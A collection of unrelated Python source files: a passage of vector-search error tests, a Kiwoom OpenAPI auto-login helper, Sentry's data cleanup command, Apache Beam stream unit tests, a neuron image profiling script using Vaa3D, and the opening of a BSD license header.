class TestSearchInvalid(object):
    """
    Test search collection with invalid collection names
    """

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_invalid_partition(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_invalid_field(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # CPU-mode skip logic kept disabled, as before:
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_invalid_collection(self, connect, get_collection_name):
        # Searching an invalid / non-existent collection name must raise.
        collection_name = get_collection_name
        with pytest.raises(Exception) as e:
            res = connect.search(collection_name, default_query)

    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
        # An invalid partition name must make search raise.
        tag = get_invalid_partition
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, partition_names=tag)

    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
        # An invalid output field name must make search raise.
        fields = [get_invalid_field]
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, fields=fields)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_not_existed_field(self, connect, collection):
        # A well-formed but non-existent field name must make search raise.
        fields = [gen_unique_str("field_name")]
        with pytest.raises(Exception) as e:
            res = connect.search(collection, default_query, fields=fields)

    """
    Test search collection with invalid query
    """

    @pytest.fixture(
        scope="function",
        params=gen_invalid_ints()
    )
    def get_top_k(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
        '''
        target: test search function, with the wrong top_k
        method: search with top_k
        expected: raise an error, and the connection is normal
        '''
        import copy
        top_k = get_top_k
        # FIX: mutate a deep copy instead of the module-level default_query,
        # which the original version polluted for every subsequent test.
        query = copy.deepcopy(default_query)
        query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    """
    Test search collection with invalid search params
    """

    @pytest.fixture(
        scope="function",
        params=gen_invaild_search_params()
    )
    def get_search_params(self, request):
        yield request.param

    # 1463
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
        '''
        target: test search function, with the wrong nprobe
        method: search with nprobe
        expected: raise an error, and the connection is normal
        '''
        search_params = get_search_params
        index_type = get_simple_index["index_type"]
        # The two skips below were deliberately disabled; kept for reference.
        if index_type in ["FLAT"]:
            # pytest.skip("skip in FLAT index")
            pass
        if index_type != search_params["index_type"]:
            # pytest.skip("skip if index_type not matched")
            pass
        entities, ids = init_data(connect, collection, nb=1200)
        connect.create_index(collection, field_name, get_simple_index)
        connect.load_collection(collection)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
                                        search_params=search_params["search_params"])
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_invalid_params_binary(self, connect, binary_collection):
        '''
        target: test search on a binary collection with an invalid nprobe
        method: search with nprobe=0
        expected: raise an error, and the connection is normal
        '''
        nq = 1
        index_type = "BIN_IVF_FLAT"
        int_vectors, entities, ids = init_binary_data(connect, binary_collection)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        connect.create_index(binary_collection, binary_field_name,
                             {"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
        connect.load_collection(binary_collection)
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        search_params={"nprobe": 0}, metric_type="JACCARD")
        with pytest.raises(Exception) as e:
            res = connect.search(binary_collection, query)

    # #1464
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
        '''
        target: test search function, with empty search params
        method: search with params
        expected: raise an error, and the connection is normal
        '''
        index_type = get_simple_index["index_type"]
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")
        if index_type == "FLAT":
            # pytest.skip("skip in FLAT index")
            pass
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        connect.load_collection(collection)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_empty_vectors(self, connect, collection):
        """
        target: test search function, with empty search vectors
        method: search
        expected: raise an exception
        """
        entities, ids = init_data(connect, collection)
        assert len(ids) == default_nb
        connect.load_collection(collection)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
class TestSearchWithExpression(object):
    """Search combined with a boolean filter expression."""

    @pytest.fixture(
        scope="function",
        params=[1, 10, 20],
    )
    def limit(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_normal_expressions(),
    )
    def expression(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=[
            {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
        ]
    )
    def index_param(self, request):
        return request.param

    @pytest.fixture(
        scope="function",
    )
    def search_params(self):
        return {"metric_type": "L2", "params": {"nprobe": 10}}

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
        """Index the collection, then run an expression-filtered search and
        check that each of the nq result lists respects the limit."""
        entities, ids = init_data(connect, collection)
        assert len(ids) == default_nb
        connect.create_index(collection, default_float_vec_field_name, index_param)
        connect.load_collection(collection)
        nq = 10
        vectors = entities[2]["values"][:nq]
        results = connect.search_with_expression(
            collection, vectors, default_float_vec_field_name,
            search_params, limit, expression)
        assert len(results) == nq
        for hits in results:
            assert len(hits) <= limit
def check_id_result(result, id, limit_in=5):
    """Return True when `id` appears among the leading hits of `result`.

    Generalized: the window size is now a parameter instead of a hard-coded
    local; the default of 5 preserves the original behavior.

    :param result: iterable of search hits, each exposing an ``.id`` attribute
    :param id: the entity id to look for
    :param limit_in: number of leading hits to inspect when the result list
        is at least that long; shorter lists are searched in full
    :return: bool
    """
    ids = [entity.id for entity in result]
    if len(ids) >= limit_in:
        return id in ids[:limit_in]
    return id in ids
|
autologin2.py | import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import openapi_path
class Window(QtWidgets.QMainWindow):
    # A QApplication must exist before any widget is created; built once as a
    # class attribute so simply instantiating Window in a fresh process works.
    app = QtWidgets.QApplication(sys.argv)

    def __init__(self):
        super().__init__()
        # Set True by OnEventConnect once the OpenAPI login succeeds.
        self.bool_connected = False
        # Kiwoom OpenAPI ActiveX control.
        self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
        self.ocx.OnEventConnect.connect(self.OnEventConnect)
        self.CommConnect()

    def CommConnect(self):
        # Ask the control to open the login window, then pump COM messages
        # until the login-complete event flips bool_connected.
        self.ocx.dynamicCall('CommConnect()')
        while not self.bool_connected:
            pythoncom.PumpWaitingMessages()

    def OnEventConnect(self, err_code):
        # err_code == 0 means login succeeded; anything else is a failure and
        # leaves the pump loop in CommConnect spinning.
        if err_code == 0:
            self.bool_connected = True
            self.AutoLoginOn()

    def AutoLoginOn(self):
        print('\n 자동 로그인 설정 대기 중 ...\n')
        # auto_on(2) fires 5 seconds later, while ShowAccountWindow below is
        # blocked on the modal account dialog it opens.
        QTimer.singleShot(5000, lambda: auto_on(2))
        self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
        print(' 자동 로그인 설정 완료\n')
        print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
    # Remove any stale auto-login file so the account window will offer the
    # auto-login setup again.
    login_info = f'{openapi_path}/system/Autologin.dat'
    if os.path.isfile(login_info):
        os.remove(f'{openapi_path}/system/Autologin.dat')
        print('\n 자동 로그인 설정 파일 삭제 완료\n')
    # Window() performs the login and account-window dance in a child
    # process, so this process stays free to drive the login dialog.
    Process(target=Window).start()
    print(' 자동 로그인 설정용 프로세스 시작\n')
    # Poll until the OpenAPI login window exists, then give it time to render
    # before typing the credentials.
    while find_window('Open API login') == 0:
        print(' 로그인창 열림 대기 중 ...\n')
        time.sleep(1)
    print(' 아이디 및 패스워드 입력 대기 중 ...\n')
    time.sleep(5)
    manual_login(4)
    print(' 아이디 및 패스워드 입력 완료\n')
|
cleanup.py | """
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
    """Resolve a project id from either a numeric string or an
    'org/project' slug pair; return None when it cannot be resolved."""
    from sentry.models import Project

    if value.isdigit():
        return int(value)
    if '/' not in value:
        return None
    org_slug, project_slug = value.split('/', 1)
    try:
        project = Project.objects.get_from_cache(
            organization__slug=org_slug,
            slug=project_slug,
        )
    except Project.DoesNotExist:
        return None
    return project.id
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
API_TOKEN_TTL_IN_DAYS = 30
def multiprocess_worker(task_queue):
    # Worker loop run inside each child Process: pulls (model_path, id_chunk)
    # jobs from task_queue and deletes them through the sentry deletions
    # machinery, until the _STOP_WORKER sentinel is received.
    # Configure within each Process
    import logging
    from sentry.utils.imports import import_string
    logger = logging.getLogger('sentry.cleanup')
    # Sentry configuration is deferred until the first real job so that a
    # worker that only ever receives the stop sentinel never pays for it.
    configured = False
    while True:
        j = task_queue.get()
        if j == _STOP_WORKER:
            task_queue.task_done()
            return
        # On first task, configure Sentry environment
        if not configured:
            from sentry.runner import configure
            configure()
            from sentry import models
            from sentry import deletions
            from sentry import similarity
            skip_models = [
                # Handled by other parts of cleanup
                models.Event,
                models.EventMapping,
                models.EventAttachment,
                models.UserReport,
                models.Group,
                models.GroupEmailThread,
                models.GroupRuleStatus,
                # Handled by TTL
                similarity.features,
            ] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
            configured = True
        model, chunk = j
        model = import_string(model)
        try:
            task = deletions.get(
                model=model,
                query={'id__in': chunk},
                skip_models=skip_models,
                transaction_id=uuid4().hex,
            )
            # Drain the deletion task chunk by chunk until nothing is left.
            while True:
                if not task.chunk():
                    break
        except Exception as e:
            # Log and keep the worker alive; one bad chunk must not kill it.
            logger.exception(e)
        finally:
            task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
    '--concurrency',
    type=int,
    default=1,
    show_default=True,
    help='The total number of concurrent worker processes to run.'
)
@click.option(
    '--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
    '--timed',
    '-t',
    default=False,
    is_flag=True,
    help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
    """Delete a portion of trailing data based on creation date.

    All data that is older than `--days` will be deleted.  The default for
    this is 30 days.  In the default setting all projects will be truncated
    but if you have a specific project you want to limit this to this can be
    done with the `--project` flag which accepts a project ID or a string
    with the form `org/project` where both are slugs.
    """
    if concurrency < 1:
        click.echo('Error: Minimum concurrency is 1', err=True)
        raise click.Abort()
    # Signals the rest of the app that it is running inside cleanup.
    os.environ['_SENTRY_CLEANUP'] = '1'
    # Make sure we fork off multiprocessing pool
    # before we import or configure the app
    from multiprocessing import Process, JoinableQueue as Queue
    pool = []
    task_queue = Queue(1000)
    for _ in xrange(concurrency):
        p = Process(target=multiprocess_worker, args=(task_queue,))
        p.daemon = True
        p.start()
        pool.append(p)
    # Only configure Sentry (and thereby Django) after the workers forked.
    from sentry.runner import configure
    configure()
    from django.db import router as db_router
    from sentry.app import nodestore
    from sentry.db.deletion import BulkDeleteQuery
    from sentry import models
    if timed:
        import time
        from sentry.utils import metrics
        start_time = time.time()
    # list of models which this query is restricted to
    model_list = {m.lower() for m in model}
    def is_filtered(model):
        # True when the model should be skipped: wrong database router, or
        # not listed in an explicit --model restriction.
        if router is not None and db_router.db_for_write(model) != router:
            return True
        if not model_list:
            return False
        return model.__name__.lower() not in model_list
    # Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
    # (model, datetime_field, order_by)
    BULK_QUERY_DELETES = [
        (models.EventMapping, 'date_added', '-date_added'),
        (models.EventAttachment, 'date_added', None),
        (models.UserReport, 'date_added', None),
        (models.GroupEmailThread, 'date', None),
        (models.GroupRuleStatus, 'date_added', None),
    ] + EXTRA_BULK_QUERY_DELETES
    # Deletions that use the `deletions` code path (which handles their child relations)
    # (model, datetime_field, order_by)
    DELETES = (
        (models.Event, 'datetime', 'datetime'),
        (models.Group, 'last_seen', 'last_seen'),
    )
    # LostPasswordHash rows have a fixed 48h TTL independent of --days.
    if not silent:
        click.echo('Removing expired values for LostPasswordHash')
    if is_filtered(models.LostPasswordHash):
        if not silent:
            click.echo('>> Skipping LostPasswordHash')
    else:
        models.LostPasswordHash.objects.filter(
            date_added__lte=timezone.now() - timedelta(hours=48)
        ).delete()
    if is_filtered(models.OrganizationMember) and not silent:
        click.echo('>> Skipping OrganizationMember')
    else:
        if not silent:
            click.echo('Removing expired values for OrganizationMember')
        expired_threshold = timezone.now() - timedelta(days=days)
        models.OrganizationMember.delete_expired(expired_threshold)
    # API grants/tokens expire on their own schedule (API_TOKEN_TTL_IN_DAYS).
    for model in [models.ApiGrant, models.ApiToken]:
        if not silent:
            click.echo(u'Removing expired values for {}'.format(model.__name__))
        if is_filtered(model):
            if not silent:
                click.echo(u'>> Skipping {}'.format(model.__name__))
        else:
            queryset = model.objects.filter(
                expires_at__lt=(timezone.now() - timedelta(days=API_TOKEN_TTL_IN_DAYS)),
            )
            # SentryAppInstallations are associated to ApiTokens. We're okay
            # with these tokens sticking around so that the Integration can
            # refresh them, but all other non-associated tokens should be
            # deleted.
            if model is models.ApiToken:
                queryset = queryset.filter(sentry_app_installation__isnull=True)
            queryset.delete()
    project_id = None
    if project:
        click.echo(
            "Bulk NodeStore deletion not available for project selection", err=True)
        project_id = get_project(project)
        if project_id is None:
            click.echo('Error: Project not found', err=True)
            raise click.Abort()
    else:
        if not silent:
            click.echo("Removing old NodeStore values")
        cutoff = timezone.now() - timedelta(days=days)
        try:
            nodestore.cleanup(cutoff)
        except NotImplementedError:
            click.echo(
                "NodeStore backend does not support cleanup operation", err=True)
    for bqd in BULK_QUERY_DELETES:
        # Entries may optionally carry a fourth element overriding the
        # default chunk size of 10000.
        if len(bqd) == 4:
            model, dtfield, order_by, chunk_size = bqd
        else:
            chunk_size = 10000
            model, dtfield, order_by = bqd
        if not silent:
            click.echo(
                u"Removing {model} for days={days} project={project}".format(
                    model=model.__name__,
                    days=days,
                    project=project or '*',
                )
            )
        if is_filtered(model):
            if not silent:
                click.echo('>> Skipping %s' % model.__name__)
        else:
            BulkDeleteQuery(
                model=model,
                dtfield=dtfield,
                days=days,
                project_id=project_id,
                order_by=order_by,
            ).execute(chunk_size=chunk_size)
    for model, dtfield, order_by in DELETES:
        if not silent:
            click.echo(
                u"Removing {model} for days={days} project={project}".format(
                    model=model.__name__,
                    days=days,
                    project=project or '*',
                )
            )
        if is_filtered(model):
            if not silent:
                click.echo('>> Skipping %s' % model.__name__)
        else:
            # These deletions are fanned out to the worker pool; join the
            # queue after each model so chunks don't interleave across models.
            imp = '.'.join((model.__module__, model.__name__))
            q = BulkDeleteQuery(
                model=model,
                dtfield=dtfield,
                days=days,
                project_id=project_id,
                order_by=order_by,
            )
            for chunk in q.iterator(chunk_size=100):
                task_queue.put((imp, chunk))
            task_queue.join()
    # Clean up FileBlob instances which are no longer used and aren't super
    # recent (as there could be a race between blob creation and reference)
    if not silent:
        click.echo("Cleaning up unused FileBlob references")
    if is_filtered(models.FileBlob):
        if not silent:
            click.echo('>> Skipping FileBlob')
    else:
        cleanup_unused_files(silent)
    # Shut down our pool
    for _ in pool:
        task_queue.put(_STOP_WORKER)
    # And wait for it to drain
    for p in pool:
        p.join()
    if timed:
        duration = int(time.time() - start_time)
        metrics.timing('cleanup.duration', duration, instance=router, sample_rate=1.0)
        click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
    """
    Remove FileBlob's (and thus the actual files) if they are no longer
    referenced by any File.

    We set a minimum-age on the query to ensure that we don't try to remove
    any blobs which are brand new and potentially in the process of being
    referenced.
    """
    from sentry.models import File, FileBlob, FileBlobIndex
    if quiet:
        from sentry.utils.query import RangeQuerySetWrapper
    else:
        from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper

    min_age = timezone.now() - timedelta(days=1)
    candidates = FileBlob.objects.filter(
        timestamp__lte=min_age,
    )
    for blob in RangeQuerySetWrapper(candidates):
        # A blob is still in use when either an index row or a File points
        # at it (short-circuit: the second query only runs if needed).
        in_use = (FileBlobIndex.objects.filter(blob=blob).exists()
                  or File.objects.filter(blob=blob).exists())
        if not in_use:
            blob.delete()
|
filesystemio_test.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for filesystemio."""
from __future__ import absolute_import
import io
import logging
import multiprocessing
import os
import threading
import unittest
from builtins import range
from apache_beam.io import filesystemio
class FakeDownloader(filesystemio.Downloader):
    """In-memory Downloader that records the size of the most recent read."""

    def __init__(self, data):
        self._data = data
        # -1 until get_range is called for the first time.
        self.last_read_size = -1

    @property
    def size(self):
        return len(self._data)

    def get_range(self, start, end):
        requested = end - start
        self.last_read_size = requested
        return self._data[start:end]
class FakeUploader(filesystemio.Uploader):
    """In-memory Uploader that accumulates writes and tracks finish state."""

    def __init__(self):
        self.data = ''
        # -1 until put() is called for the first time.
        self.last_write_size = -1
        self.finished = False

    def last_error(self):
        return None

    def put(self, data):
        assert not self.finished
        chunk = data.tobytes()
        self.data += chunk
        self.last_write_size = len(data)

    def finish(self):
        self.finished = True
class TestDownloaderStream(unittest.TestCase):

    def test_file_attributes(self):
        stream = filesystemio.DownloaderStream(FakeDownloader(data=None))
        self.assertEqual(stream.mode, 'r')
        self.assertTrue(stream.readable())
        self.assertFalse(stream.writable())
        self.assertTrue(stream.seekable())

    def test_read_empty(self):
        stream = filesystemio.DownloaderStream(FakeDownloader(data=''))
        self.assertEqual(stream.read(), '')

    def test_read(self):
        payload = 'abcde'
        downloader = FakeDownloader(payload)
        stream = filesystemio.DownloaderStream(downloader)
        # Unbuffered: each read() translates to exactly one downloader
        # request of the requested size.
        self.assertEqual(stream.read(1), payload[0])
        self.assertEqual(downloader.last_read_size, 1)
        self.assertEqual(stream.read(), payload[1:])
        self.assertEqual(downloader.last_read_size, len(payload) - 1)

    def test_read_buffered(self):
        payload = 'abcde'
        downloader = FakeDownloader(payload)
        buffer_size = 2
        stream = io.BufferedReader(
            filesystemio.DownloaderStream(downloader), buffer_size)
        # The buffered reader should read ahead in buffer_size chunks.
        self.assertEqual(stream.read(1), payload[0])
        self.assertEqual(downloader.last_read_size, buffer_size)
        self.assertEqual(stream.read(), payload[1:])
class TestUploaderStream(unittest.TestCase):

    def test_file_attributes(self):
        stream = filesystemio.UploaderStream(FakeUploader())
        self.assertEqual(stream.mode, 'w')
        self.assertFalse(stream.readable())
        self.assertTrue(stream.writable())
        self.assertFalse(stream.seekable())

    def test_write_empty(self):
        uploader = FakeUploader()
        stream = filesystemio.UploaderStream(uploader)
        stream.write(memoryview(''))
        self.assertEqual(uploader.data, '')

    def test_write(self):
        payload = 'abcde'
        uploader = FakeUploader()
        stream = filesystemio.UploaderStream(uploader)
        # Unbuffered: each write() results in exactly one put().
        stream.write(memoryview(payload[0]))
        self.assertEqual(uploader.data[0], payload[0])
        self.assertEqual(uploader.last_write_size, 1)
        stream.write(memoryview(payload[1:]))
        self.assertEqual(uploader.data, payload)
        self.assertEqual(uploader.last_write_size, len(payload) - 1)

    def test_write_buffered(self):
        payload = 'abcde'
        uploader = FakeUploader()
        buffer_size = 2
        stream = io.BufferedWriter(
            filesystemio.UploaderStream(uploader), buffer_size)
        # Nothing reaches the uploader until the buffer fills or is flushed
        # on close.
        stream.write(payload[0])
        self.assertEqual(-1, uploader.last_write_size)
        stream.write(payload[1:])
        stream.close()
        self.assertEqual(payload, uploader.data)
class TestPipeStream(unittest.TestCase):

    def _read_and_verify(self, stream, expected, buffer_size):
        # Runs in a child thread: reads `stream` to exhaustion in
        # `buffer_size` chunks, checking that a short read only ever occurs
        # for the final non-empty chunk, that tell() tracks the running byte
        # count, and that the concatenated data equals `expected`.
        data_list = []
        bytes_read = 0
        seen_last_block = False
        while True:
            data = stream.read(buffer_size)
            self.assertLessEqual(len(data), buffer_size)
            if len(data) < buffer_size:
                # Test the constraint that the pipe stream returns less than the buffer
                # size only when at the end of the stream.
                if data:
                    self.assertFalse(seen_last_block)
                    seen_last_block = True
                if not data:
                    break
            data_list.append(data)
            bytes_read += len(data)
            self.assertEqual(stream.tell(), bytes_read)
        self.assertEqual(''.join(data_list), expected)

    def test_pipe_stream(self):
        # Exercise block sizes 4^0 .. 4^11 against several buffer sizes; the
        # reader runs in a thread while this thread feeds the pipe's parent
        # end and then closes it to signal EOF.
        block_sizes = list(4**i for i in range(0, 12))
        data_blocks = list(os.urandom(size) for size in block_sizes)
        expected = ''.join(data_blocks)
        buffer_sizes = [100001, 512 * 1024, 1024 * 1024]
        for buffer_size in buffer_sizes:
            parent_conn, child_conn = multiprocessing.Pipe()
            stream = filesystemio.PipeStream(child_conn)
            child_thread = threading.Thread(
                target=self._read_and_verify, args=(stream, expected, buffer_size))
            child_thread.start()
            for data in data_blocks:
                parent_conn.send_bytes(data)
            parent_conn.close()
            child_thread.join()
if __name__ == '__main__':
    # Show INFO-level logs while the test suite runs.
    logging.getLogger().setLevel(logging.INFO)
    unittest.main()
|
lims_image_tracing.py | __author__ = 'coriannaj'
###
import os
import subprocess, threading
import pandas as pd
import math
import re
from lims_access import get_mip
# Cluster-side Vaa3D launcher script; every Vaa3D job below shells out through it.
V3D = "/data/mat/xiaoxiaol/work/bin/bin_vaa3d_for_clusters/start_vaa3d.sh"
class Command(object):
    """Run a shell command on a worker thread and kill it after a timeout.

    NOTE: this module is Python 2 (print statements, xrange elsewhere).
    """

    def __init__(self, cmd):
        self.cmd = cmd       # full shell command line to execute
        self.process = None  # Popen handle, set once run() starts

    def run(self, timeout):
        # Launch self.cmd via a shell; if it is still running after `timeout`
        # seconds, terminate it and wait for the worker thread to finish.
        def target():
            self.process = subprocess.Popen(self.cmd, shell=True)
            self.process.communicate()
        thread = threading.Thread(target=target)
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            # Timed out: kill the child process, then reap the worker thread.
            print 'Terminating process'
            print self.cmd
            self.process.terminate()
            thread.join()
def RUN_Vaa3d_Job(arguments):
    """Run Vaa3D with `arguments` appended to the launcher script.

    Uses a 10-minute timeout; `arguments` must start with its own separator
    (callers pass a leading space).
    """
    # run in local python env
    cmd = V3D + arguments
    print cmd
    command = Command(cmd)
    command.run(timeout=60 * 10)
    return
def profiling(input_img, input_swc, output_file, dilation_ratio=3, flip=0, invert=0, cutoff_ratio=0.05, logfile=""):
    """Run the Vaa3D 'profiling' plugin (profile_swc) on an image/SWC pair.

    `cutoff_ratio` is accepted but not forwarded to the plugin.
    NOTE(review): `logfile` is concatenated with no separating space, so a
    non-empty value must carry its own leading ' ' / redirection -- confirm.
    """
    arguments = " -x profiling -f profile_swc -i " + input_img + " " + input_swc + " -o " + output_file + " -p " + str(dilation_ratio) + " " + str(flip) + " " + str(invert) + logfile
    RUN_Vaa3d_Job(arguments)
    return
def convert_img(input_img, output_img):
    """Convert `input_img` to 8-bit (UCHAR, mode 2) via the idpImageReadWrite tool."""
    arguments = "/data/mat/zhi/idpImageReadWrite " + input_img + " " + output_img + " UCHAR 2"
    print arguments
    command = Command(arguments)
    command.run(timeout=60 * 10)
    return
def distanceFromRoot(root_x, root_y, root_z, x, y, z):
    """Planar (xy) distance between the root node and (x, y, z).

    The z coordinates are accepted but deliberately ignored: distances are
    measured in 2D only. A 3D variant would add (root_z - z)**2 to the sum.
    """
    dx = root_x - x
    dy = root_y - y
    return math.sqrt(dx ** 2 + dy ** 2)
def buildSpliceSWC(df, orig_df, max_dist):
    """Append to `df` the root of `orig_df` plus every node within `max_dist`
    (2D, xy-plane) of that root. Mutates `df` in place."""
    assert(orig_df.at[0, 'pid'] == -1)  # asserting it is root
    df.loc[len(df)] = orig_df.loc[0]
    root_x = orig_df.at[0, 'x']
    root_y = orig_df.at[0, 'y']
    root_z = orig_df.at[0, 'z']
    nodes = len(orig_df.index)
    for i in xrange(1, nodes):  # xrange: Python 2 module
        dist = distanceFromRoot(root_x, root_y, root_z, orig_df.at[i, 'x'], orig_df.at[i, 'y'], orig_df.at[i, 'z'])
        if dist < max_dist:
            df.loc[len(df)] = orig_df.loc[i]
def spliceSWC(swc, write_path, splice_dist):
    """Write '<name>_splice.swc' under `write_path` containing only the nodes
    of `swc` within `splice_dist` of its root; return the new file's path."""
    swc_identifier = swc.split('/')[-1]
    print swc_identifier
    cols = ['id', 'type', 'x', 'y', 'z', 'radius', 'pid']
    fullswc_df = pd.read_csv(swc, delim_whitespace=True, comment='#', skiprows=1, names=cols)
    spliceswc_df = pd.DataFrame(columns=cols)
    buildSpliceSWC(spliceswc_df, fullswc_df, splice_dist)
    swc_loc = os.path.join(write_path, swc_identifier.split('.swc')[0] + '_splice.swc')
    # id/type/pid must be written as integers to keep the SWC format valid.
    spliceswc_df['id'] = spliceswc_df['id'].astype(dtype=int)
    spliceswc_df['type'] = spliceswc_df['type'].astype(dtype=int)
    spliceswc_df['pid'] = spliceswc_df['pid'].astype(dtype=int)
    spliceswc_df.to_csv(swc_loc, sep=' ', header=False, index=False)
    print 'swc stored : %s' % swc_loc
    print spliceswc_df
    return swc_loc
# works specifically for the format set up in the gold folder
def runLIMS(data_path, write_path, overall_csv, splice_dist):
    """For every SWC file under `data_path`: fetch its MIP image from LIMS,
    convert it to 8-bit TIFF, splice the SWC around the root, profile it with
    Vaa3D, and collect the per-image quality stats into `overall_csv`."""
    # create df table with headers
    cols = ['image_id', 'CNR', 'SNR', 'dynamic_range', 'mean_fg', 'std_fg', 'mean_bg', 'std_bg', 'mean_tubularity', 'std_tubularity']
    overall_profile = pd.DataFrame(columns=cols)
    print data_path
    dataimg_path = '/projects/mousecelltypes/vol1/'  # NOTE(review): unused -- confirm before removing
    for f in os.listdir(data_path):
        identifier = f.split('.swc')[0]
        swc = os.path.join(data_path, f)
        img = os.path.join(write_path, identifier) + '.tif'
        print "swc is %s" % swc
        profile_path = os.path.join(write_path, identifier + '_splice.csv')
        # Image-series id is embedded in the file name, e.g. 123.456.789.012.
        series_id = re.search('\d*\.\d*\.\d*\.\d*', identifier)
        print "identifier : %s series id: %s" % (identifier, series_id.group(0))
        lims_img_path = get_mip(series_id.group(0))
        convert_img(lims_img_path, img)
        swc = spliceSWC(swc, write_path, splice_dist)
        if swc != None and img != None:
            profiling(img, swc, profile_path, 3, 1, 1)
            print "Img: %s" % img
            print "Swc: %s" % swc
            print "Profile path: %s" % profile_path
            try:
                profile_df = pd.read_csv(profile_path)
            except IOError:
                print "Image %s did not create a profile.csv" % swc
            else:
                # if file exists get data
                # take from row 2 because only want dendrite data, type=3
                stats = [identifier, profile_df.at[2, 'cnr'], profile_df.at[2, 'snr'], profile_df.at[2, 'dynamic_range'], profile_df.at[2, 'fg_mean'], profile_df.at[2, 'fg_std'], profile_df.at[2, 'bg_mean'], profile_df.at[2, 'bg_std'], profile_df.at[2, 'tubularity_mean'], profile_df.at[2, 'tubularity_std']]
                print stats
                overall_profile.loc[len(overall_profile)] = stats
    print "exporting csv"
    print overall_profile
    overall_profile.sort_values(by='image_id', inplace=True)
    overall_profile.to_csv(os.path.join(write_path, overall_csv), index=False)
    return
runLIMS('/local1/home/coriannaj/Desktop/NiviData/Version1','/data/mat/xiaoxiaol/data/NiviData/test', 'overall_splice.csv', 500) |
master_list_model.py | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
